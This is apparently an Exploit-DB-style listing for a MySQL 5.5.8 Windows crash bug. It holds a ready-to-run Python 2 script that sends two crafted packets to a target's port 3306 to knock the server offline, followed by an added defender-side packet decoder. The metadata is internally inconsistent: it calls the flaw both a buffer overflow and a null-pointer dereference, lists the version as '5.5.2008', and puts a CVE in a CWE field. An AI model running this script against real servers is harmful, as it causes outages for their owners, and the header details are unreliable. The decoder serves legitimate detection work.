Vendor: MySQL
By: Level Smash the Stack
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: MySQL
Affected Version From: 5.5.2008
Affected Version To: 5.5.2008
Patch Exists: YES
Related CWE: CVE-2013-0229
CPE: a:mysql:mysql:5.5.8
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013

MySQL 5.5.8 Null Ptr (windows)

This exploit targets a buffer overflow vulnerability in MySQL 5.5.8 on Windows. It allows an attacker to send a specially crafted packet to the MySQL server, causing a null pointer dereference that crashes the server. The crash is triggered by sending two specially crafted packets: the first contains a null byte followed by a 4-byte integer, and the second contains a specially crafted string. The server crashes when it attempts to process the second packet.

Mitigation:

Upgrade to the latest version of MySQL, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# Python 2 proof-of-concept (crash only). Indentation restored from the
# Exploit-DB listing; comments added to describe what each packet carries.
import socket, sys

print "\n"
print "----------------------------------------------------------------"
print "| MySQL 5.5.8 Null Ptr (windows)                                |"
print "| Level Smash the Stack                                         |"
print "----------------------------------------------------------------"
print "\n"

# Packet 1: a 38-byte HandshakeResponse41 (client login) with sequence id 1:
# capability flags, max packet size, charset, 23 reserved zero bytes, the
# user name "root" and a zero-length auth response. It is sent without
# waiting for the server greeting.
buf = ("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

# Packet 2: a 17-byte COM_QUERY (0x03) packet with sequence id 0 carrying the
# text "set autocommit30".
buf2 = ("\x11\x00\x00\x00\x03set autocommit30")

def usage():
    print "usage : ./mysql.py <victim_ip>"
    print "example: ./mysql.py 192.168.1.22"


def main():
    if len(sys.argv) != 2:
        usage()
        sys.exit()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    HOST = sys.argv[1]
    PORT = 3306  # default MySQL port
    s.connect((HOST, PORT))
    print "[*] Connect"
    s.send(buf)
    print "[*] Payload 1 sent"
    s.send(buf2)
    print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
    s.close()

if __name__ == "__main__":
    main()
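As an added defender-side example (not part of the Exploit-DB listing or the PoC author's code), the following Python 3 decoder shows what a network sensor or log pipeline would see in the two packets above: it checks the MySQL wire framing (3-byte length plus sequence id) and decodes the login and command payloads. The constants CLIENT_PROTOCOL_41 and COM_QUERY are the standard MySQL protocol values; the two packets are re-typed here as bytes so the code runs offline.

```python
import struct

# Standard MySQL protocol constants (not taken from the PoC).
CLIENT_PROTOCOL_41 = 0x00000200  # capability flag: 4.1-style login packet
COM_QUERY = 0x03                 # command byte: text query

# The two PoC packets re-typed as Python 3 bytes (constructed copy for offline use).
LOGIN_PACKET = (b"&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93"
                + b"\x00" * 23 + b"root\x00\x00")
QUERY_PACKET = b"\x11\x00\x00\x00\x03set autocommit30"

def split_packets(data):
    """Split a client->server stream into (seq_id, payload) pairs.
    Framing: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    packets, pos = [], 0
    while pos < len(data):
        if len(data) - pos < 4:
            raise ValueError("truncated header at offset %d" % pos)
        length = int.from_bytes(data[pos:pos + 3], "little")
        payload = data[pos + 4:pos + 4 + length]
        if len(payload) != length:  # header promises bytes that are not there
            raise ValueError("declared %d payload bytes, got %d" % (length, len(payload)))
        packets.append((data[pos + 3], payload))
        pos += 4 + length
    return packets

def decode_login(payload):
    """Decode a HandshakeResponse41 payload: flags, max packet, charset, user."""
    caps, max_packet, charset = struct.unpack_from("<IIB", payload, 0)
    if not caps & CLIENT_PROTOCOL_41:
        raise ValueError("not a protocol-4.1 login packet")
    end = payload.index(b"\x00", 32)  # 23 reserved bytes, then NUL-terminated user
    return {"capabilities": caps, "max_packet": max_packet, "charset": charset,
            "user": payload[32:end].decode("ascii"), "auth_len": payload[end + 1]}

def decode_command(payload):
    """Decode a command packet; only COM_QUERY is expanded to its query text."""
    if payload[0] == COM_QUERY:
        return {"command": "COM_QUERY", "query": payload[1:].decode("ascii", "replace")}
    return {"command": "0x%02x" % payload[0]}

def decode_stream(data):
    """Treat the first packet as the login and every later one as a command."""
    packets = split_packets(data)
    return [decode_login(packets[0][1])] + [decode_command(p) for _, p in packets[1:]]
```

Running decode_stream over the concatenated packets yields a login as user "root" with an empty auth response, followed by a COM_QUERY for "set autocommit30"; the framing of both packets is internally consistent, so a sensor has to look at the decoded fields rather than the length headers to flag this traffic.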